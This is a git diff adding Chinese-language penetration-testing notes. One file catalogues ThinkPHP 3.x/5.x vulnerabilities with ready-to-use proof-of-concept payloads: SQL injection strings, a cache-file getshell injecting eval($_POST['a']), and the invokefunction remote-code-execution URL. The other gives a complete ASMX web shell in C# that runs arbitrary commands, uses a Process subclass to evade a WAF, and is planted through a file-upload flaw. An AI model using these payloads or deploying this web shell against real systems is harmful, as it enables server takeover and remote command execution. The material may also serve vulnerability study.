diff --git a/tp5-getshell/ThinkPHP.md b/tp5-getshell/ThinkPHP.md new file mode 100644 index 0000000..eae2fe0 --- /dev/null +++ b/tp5-getshell/ThinkPHP.md @@ -0,0 +1,241 @@ +## ThinkPHP 漏洞列表 + +### 一、3.x + +>使用方法 +> +>```bash +>cd /var/www/tp3 +>``` +> + +#### ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell + +| 标题 | ThinkPHP5.0.10-3.2.3缓存函数设计缺陷可导致Getshell | +| -------- | -------------------------------------------------- | +| 时间 | 2017-08-09 | +| 版本 | <= 3.2.3 | +| 文章链接 | | + + +#### ThinkPHP3.2.3_最新版update注入漏洞 + +| 标题 | Thinkphp3.2.3最新版update注入漏洞 | +| -------- | ----------------------------------------- | +| 时间 | 2018-04-16 | +| 版本 | <= 3.2.3 | +| 文章链接 | | + + +#### ThinkPHP3.2.X_find_select_delete注入 + +| 标题 | thinkphp3.2 find_select_delete注入 | +| -------- | ------------------------------------------------------------ | +| 时间 | 2018-08-23 | +| 版本 | <= 3.2.3 | +| 文章链接 |
| + +#### ThinkPHP3.X_order_by注入漏洞 + +| 标题 | ThinkPHP 3.X/5.X order by注入漏洞 | +| -------- | --------------------------------------------------- | +| 时间 | 2018-08-29 | +| 版本 | <= 3.2.3 | +| 文章链接 | | + + +### 二、5.x + +>使用方法 +> +>```bash +>cd /var/www/tp5 +>``` +> + +#### ThinkPHP5_SQL注入漏洞&&敏感信息泄露 + +| 标题 | ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 | +| -------- | ------------------------------------------------------------ | +| 时间 | 2017-07-03 | +| 版本 | < 5.0.9 | +| 文章链接 | https://xz.aliyun.com/t/125
| + +>测试方法 +> +>```bash +>git checkout 02f8e8a +>``` +> +>测试代码 +> +>```php +>public function testsql() +>{ +> $ids = input('ids/a'); +> $result = db('user')->where('id', 'in', $ids)->select(); +> var_dump($result); +>} +>``` +> +>POC +> +>```php +>testsql?ids[0,updatexml(0,concat(0xa,user()),0)]=1231 +>``` +> +>结果 +> +>![20170703.png](image/ThinkPHP/2017-07-03.png) + +#### ThinkPHP5.0.10-3.2.3_缓存函数设计缺陷可导致Getshell + +| 标题 | ThinkPHP5.0.10-3.2.3 缓存函数设计缺陷可导致Getshell | +| -------- | --------------------------------------------------- | +| 时间 | 2017-08-09 | +| 版本 | < 5.0.11 | +| 文章链接 | | + + >测试方法 + > + >```bash + >git checkout 094dde5 + >``` + > + >测试代码 + > + >```php + >public function add() + >{ + > $user = input('post.'); + > $m=db('user')->where(['id'=> 1])->insert($user); + >} + > + >public function cache() + >{ + > $m = db('user')->select(); + > Cache::set('name',$m,3600); + >} + >``` + > + >POC + > + >```php + >post data: + > username=%2F%2F%0D%0A%24a%3Deval(%24_POST%5B%27a%27%5D)%3B%23 + >注:%2F%2F%0D%0A = //+回车 + >``` + > + >结果 + > + >![img](image/ThinkPHP/2017-08-09-1.png) + > + >![img](image/ThinkPHP/2017-08-09-2.png) + > + >![img](image/ThinkPHP/2017-08-09-3.png) + > + >其中文件路径和名称是 b0+68931cc450442b63f5b3d276ea4297 而 + > + >md5('name') = b068931cc450442b63f5b3d276ea4297 + +#### ThinkPHP框架5.0.X_sql注入漏洞分析 + +| 标题 | ThinkPHP框架 5.0.x sql注入漏洞分析 | +| -------- | --------------------------------------------------- | +| 时间 | 2018-04-09 | +| 版本 | < 5.0.16 | +| 文章链接 | | + +>测试方法 +> +>```bash +>git checkout 7c13757 +>``` +> +>测试代码 +> +>```php +>public function testsql() +> { +> $username = input('get.username/a'); +> db('user')->where(['id'=> 1])->insert(['username'=>$username]); +> } +>``` +> +>POC +> +>```php +>testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1 +>``` +> +>结果 +> +>![img](image/ThinkPHP/2018-04-09.png) + +#### ThinkPHP5.X_order_by注入漏洞 + +| 标题 | ThinkPHP 3.X/5.X order by注入漏洞 | +| -------- | --------------------------------------------------- | +| 时间 | 2018-08-23 | +| 版本 | <= 5.1.22 | +| 文章链接 | | + +>测试方法 +> +>```bash +>git checkout 35e9878 +>``` +> +>测试代码 +> +>```php +>public function testsql() +>{ +> $order = input('get.order'); +> $m = db('user')->order($order)->find(); +> var_dump($m); +>} +>``` +> +>POC +> +>```php +>testsql?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1 +>``` +> +>结果 +> +>![img](image/ThinkPHP/2018-08-23.png) + +#### ThinkPHP5.X_远程代码执行 + +| 标题 | ThinkPHP5.X 远程代码执行 | +| -------- | ------------------------------------------------------------ | +| 时间 | 2018-12-10 | +| 版本 | 5.0.5-5.0.22
5.1.0-5.1.30 | +| 文章链接 |
https://paper.seebug.org/760/
| +>测试方法 +> +>```bash +>git checkout 4fefa5e +>``` +> +>测试代码 +> +>```php +>public function index() +> { +> //...无需实际代码 +> } +> ``` +> +>POC +> +>```php +>index?s=index/\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 +>``` +> +>结果 +> +>![img](image/ThinkPHP/2018-12-10.png) + diff --git a/tp5-getshell/image/ThinkPHP/2017-07-03.png b/tp5-getshell/image/ThinkPHP/2017-07-03.png new file mode 100644 index 0000000..62e5f52 Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2017-07-03.png differ diff --git a/tp5-getshell/image/ThinkPHP/2017-08-09-1.png b/tp5-getshell/image/ThinkPHP/2017-08-09-1.png new file mode 100644 index 0000000..558127d Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2017-08-09-1.png differ diff --git a/tp5-getshell/image/ThinkPHP/2017-08-09-2.png b/tp5-getshell/image/ThinkPHP/2017-08-09-2.png new file mode 100644 index 0000000..d4203f7 Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2017-08-09-2.png differ diff --git a/tp5-getshell/image/ThinkPHP/2017-08-09-3.png b/tp5-getshell/image/ThinkPHP/2017-08-09-3.png new file mode 100644 index 0000000..38040da Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2017-08-09-3.png differ diff --git a/tp5-getshell/image/ThinkPHP/2018-04-09.png b/tp5-getshell/image/ThinkPHP/2018-04-09.png new file mode 100644 index 0000000..b22fbe9 Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2018-04-09.png differ diff --git a/tp5-getshell/image/ThinkPHP/2018-08-23.png b/tp5-getshell/image/ThinkPHP/2018-08-23.png new file mode 100644 index 0000000..20f94fe Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2018-08-23.png differ diff --git a/tp5-getshell/image/ThinkPHP/2018-12-10.png b/tp5-getshell/image/ThinkPHP/2018-12-10.png new file mode 100644 index 0000000..6ae2361 Binary files /dev/null and b/tp5-getshell/image/ThinkPHP/2018-12-10.png differ diff --git a/构建ASMX绕过限制WAF达到命令执行.md b/构建ASMX绕过限制WAF达到命令执行.md new file mode 100644 index 0000000..9c49493 --- /dev/null +++ b/构建ASMX绕过限制WAF达到命令执行.md @@ -0,0 +1,117 @@ +### 以下信息来自倾旋知识星球,在此做整理 + +> 近日,在遇到一个WAF,目标服务器配置如下: + +> 1. ASP.NET +> 2.IIS +> 3.Windows +> 4.X WAF +> 5.不允许上传 ASP、ASPX、ASA、CER、.... +> 6.任意文件上传漏洞 +> 于是想到还有ASMX,构建SOAP接口,分享给大家以便留存 +> 另外,WAF还拦截“Process()”,于是在C#代码里,创建了一个子类继承Process父类,然后实例化: + +![](img/process.png) + +``` +public class New_Process :Process +{ + public New_Process(string s) + { + + } + +} + +Process e = new New_Process("something"); +``` + +``` +POST /UploadPath/User/201908221824334713.asmx HTTP/1.1 +Host: example.com +Content-Type: text/xml; charset=utf-8 +Content-Length: 363 +SOAPAction: "http://payloads.online/Test" + + + + + + cmd.exe + /c whoami + + + +``` +--------------------------------------------------- + +![](img/ASMX.png) +``` +<%@ WebService Language="C#" Class="Service" %> +using System; +using System.Web; +using System.IO; +using System.Net; +using System.Text; +using System.Data; +using System.Data.SqlClient; +using System.Collections.Generic; +using System.Diagnostics; +using System.Web.SessionState; +using System.Web.Services; +using System.Xml; +using System.Web.Services.Protocols; + +[WebService(Namespace = "http://payloads.online/")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] + +public class New_Process :Process +{ + public New_Process(string s) + { + + } + +} + + +public class Service : System.Web.Services.WebService +{ + public Service() + { + + } + + [WebMethod] + public string Test(string Z1,string Z2) + { + String R; + + ProcessStartInfo c = new ProcessStartInfo(Z1,Z2); + Process e = new New_Process("something"); + StreamReader OT, ER; + c.UseShellExecute = false; + c.RedirectStandardOutput = true; + c.RedirectStandardError = true; + e.StartInfo = c; + + e.Start(); + OT = e.StandardOutput; + ER = e.StandardError; + e.Close(); + R = OT.ReadToEnd() + ER.ReadToEnd(); + HttpContext.Current.Response.Clear(); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.Write(""); + HttpContext.Current.Response.End(); + return R; + } +} +``` +